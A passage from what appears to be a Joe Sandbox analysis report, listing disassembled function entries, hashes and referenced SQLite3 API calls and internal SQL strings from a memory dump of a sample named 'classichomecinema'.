                                                                                        • Instruction ID: 7a9bf9350bb0d435b7485bd9c083abc2dab3a9c90cc7cce47300d03dda88f0d0
                                                                                        • Opcode Fuzzy Hash: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                                                        • Instruction Fuzzy Hash: FFD092B4909309AFCB00EF29C48644EBBE5AF98258F40C82DFC98C7314E274E8408F92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                                                        • Instruction ID: 29002ccca7877ead4b7e7e784383ace88c03f26ddf616943a2b43c0eb71ea2e3
                                                                                        • Opcode Fuzzy Hash: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                                                        • Instruction Fuzzy Hash: 36E0E2B850430DABDF00CF09D8C188A7BAAFB08364F10C119FC190B305C371E9548BA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                                                        • Instruction ID: a276b763828cd9d21177d39229c24ef0f5c00ef14d0f26540801fec71d9d5410
                                                                                        • Opcode Fuzzy Hash: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                                                        • Instruction Fuzzy Hash: 29E0E2B850430DABDF00CF09D8C198A7BAAFB08264F10C119FC190B304C331E9148BE1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                        • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                                                        • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                        • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                                                        APIs
                                                                                        • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                                                          • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                        • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                                                        • sqlite3_free.SQLITE3 ref: 6096C67E
                                                                                        • sqlite3_free.SQLITE3 ref: 6096CD71
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                                                        • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                                                        • sqlite3_close.SQLITE3 ref: 6096CD97
                                                                                        • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                                                        • API String ID: 1320758876-2501389569
                                                                                        • Opcode ID: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                        • Instruction ID: 66f98c4e8467cc0752991b2fada45a5d6d89a43a55ba94f1559c09c68fc79e30
                                                                                        • Opcode Fuzzy Hash: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                        • Instruction Fuzzy Hash: 7A024BB05183019BEB119F64C49536ABFF6BFA1348F11882DE8959F386D7B9C845CF82
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                                        • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                        • API String ID: 937752868-2111127023
                                                                                        • Opcode ID: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
                                                                                        • Instruction ID: 65a1564e5812e901c47d2d0e8e64920046ae54dd737849fc0956122b524b53c9
                                                                                        • Opcode Fuzzy Hash: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
                                                                                        • Instruction Fuzzy Hash: 19512C706187018FE700AF69D88575DBFF6AFA5708F10C81DE8999B214EB78C845DF42
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc$sqlite3_freesqlite3_vfs_find
                                                                                        • String ID: @$access$cache
                                                                                        • API String ID: 4158134138-1361544076
                                                                                        • Opcode ID: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                                        • Instruction ID: 35071b2ec389daa84eb338d99e29a1052eb2425681bc363379ff67fe3f9a0dd7
                                                                                        • Opcode Fuzzy Hash: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                                        • Instruction Fuzzy Hash: 27D19E75D183458BDB11CF69E58039EBBF7AFAA304F20846ED4949B349D339D882CB52
                                                                                        APIs
                                                                                        Strings
                                                                                        • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                                        • BEGIN;, xrefs: 609485DB
                                                                                        • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                                        • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                                        • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                                        • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                                        • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                                        • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                                        • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                                        • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                                        • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                                        • API String ID: 632333372-52344843
                                                                                        • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                        • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                                        • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                        • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                                        APIs
                                                                                          • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                          • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                          • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                          • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                          • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                          • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                          • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                        • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                        • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                        • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                        • sqlite3_free.SQLITE3 ref: 60960618
                                                                                        • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                        • String ID: offsets
                                                                                        • API String ID: 463808202-2642679573
                                                                                        • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                        • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                        • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                        • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                        APIs
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                        • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                        • String ID:
                                                                                        • API String ID: 2903785150-0
                                                                                        • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                        • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                        • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                        • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_malloc
                                                                                        • String ID:
                                                                                        • API String ID: 423083942-0
                                                                                        • Opcode ID: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                        • Instruction ID: dba10035f3c017a022ff92dc0406edc4c972eb6647695f7afdbed5011b3e14eb
                                                                                        • Opcode Fuzzy Hash: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                        • Instruction Fuzzy Hash: 9112E3B4A15218CFCB18CF98D480A9EBBF6BF98304F24855AD855AB319D774EC42CF90
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                        • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                        • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                        • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                        • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                        • String ID:
                                                                                        • API String ID: 3556715608-0
                                                                                        • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                        • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                        • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                        • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                        APIs
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6095F645
                                                                                        • sqlite3_exec.SQLITE3 ref: 6095F686
                                                                                          • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                        • sqlite3_free_table.SQLITE3 ref: 6095F6A0
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 6095F6C7
                                                                                          • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                          • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                        • sqlite3_free.SQLITE3 ref: 6095F6B4
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        • sqlite3_free.SQLITE3 ref: 6095F6D4
                                                                                        • sqlite3_free.SQLITE3 ref: 6095F6ED
                                                                                        • sqlite3_free_table.SQLITE3 ref: 6095F6FF
                                                                                        • sqlite3_realloc.SQLITE3 ref: 6095F71B
                                                                                        • sqlite3_free_table.SQLITE3 ref: 6095F72D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_free_table$sqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_reallocsqlite3_vmprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1866449048-0
                                                                                        • Opcode ID: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                        • Instruction ID: 9ac78cbffd0e0cf27e5d0fdbf17c3a3d034f00011a14f89e76d08e502163788c
                                                                                        • Opcode Fuzzy Hash: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                        • Instruction Fuzzy Hash: 8751F1B49467099FDB01DF69D59178EBBF6FF68318F104429E884AB300D379D894CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                        • API String ID: 0-780898
                                                                                        • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                        • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                        • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
